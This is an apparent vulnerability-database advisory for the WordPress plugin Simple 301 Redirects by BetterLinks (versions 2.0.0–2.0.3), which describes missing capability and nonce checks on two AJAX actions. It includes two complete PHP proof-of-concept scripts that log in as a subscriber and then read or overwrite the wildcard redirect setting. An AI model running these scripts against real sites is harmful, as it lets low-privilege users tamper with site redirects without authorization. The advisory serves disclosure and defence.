WordPress Plugin Vulnerabilities
Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Update and Retrieve Wildcard Value
Description
In the plugin, the lack of capability checks and insufficient nonce check on the AJAX actions, simple301redirects/admin/get_wildcard and simple301redirects/admin/wildcard, made it possible for authenticated users to retrieve and update the wildcard value for redirects.
Proof of Concept
<?php // Settings $siteurl = $argv[1]; $wp_user = $argv[2]; $wp_pass = $argv[3]; echo 'Logging in!'; // 1) Log in as sub+ $ch = curl_init(); $cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-'); curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-login.php'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ 'log' => $wp_user, 'pwd' => $wp_pass, 'rememberme' => 'forever', 'wp-submit' => 'Log+In', ]); $output = curl_exec($ch); curl_close($ch); echo 'Getting REST API Nonce!'; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-admin/admin-ajax.php?action=rest-nonce'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); //Import Nonce preg_match('/([^"]+)/', $content, $matches); $restnonce = $matches[1]; echo $restnonce; echo 'wildcard!'; //Wildcard $ch = curl_init(); curl_setopt( $ch, CURLOPT_URL, $siteurl . '/wp-admin/admin-ajax.php' ); curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' ); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true ); curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true ); curl_setopt( $ch, CURLOPT_POST, true ); curl_setopt( $ch, CURLOPT_POSTFIELDS, [ 'action' => 'simple301redirects/admin/wildcard', 'security' => $restnonce, 'toggle' => 'I have updated this setting!', ] ); $output = curl_exec($ch); curl_close($ch); print($output) ?> <?php // Settings $siteurl = $argv[1]; $wp_user = $argv[2]; $wp_pass = $argv[3]; echo 'Logging in!'; // 1) Log in as sub+ $ch = curl_init(); $cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-'); curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-login.php'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ 'log' => $wp_user, 'pwd' => $wp_pass, 'rememberme' => 'forever', 'wp-submit' => 'Log+In', ]); $output = curl_exec($ch); curl_close($ch); echo 'Getting REST API Nonce!'; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-admin/admin-ajax.php?action=rest-nonce'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); //Import Nonce preg_match('/([^"]+)/', $content, $matches); $restnonce = $matches[1]; echo $restnonce; echo 'Get wildcard!'; //Get wildcard $ch = curl_init(); curl_setopt( $ch, CURLOPT_URL, $siteurl . '/wp-admin/admin-ajax.php' ); curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' ); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true ); curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true ); curl_setopt( $ch, CURLOPT_POST, true ); curl_setopt( $ch, CURLOPT_POSTFIELDS, [ 'action' => 'simple301redirects/admin/get_wildcard', 'security' => $restnonce, ] ); $output = curl_exec($ch); curl_close($ch); print($output) ?>
Affects Plugins
References
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-05-26 (about 2 years ago)
Added
2021-05-26 (about 2 years ago)
Last Updated
2021-05-27 (about 2 years ago)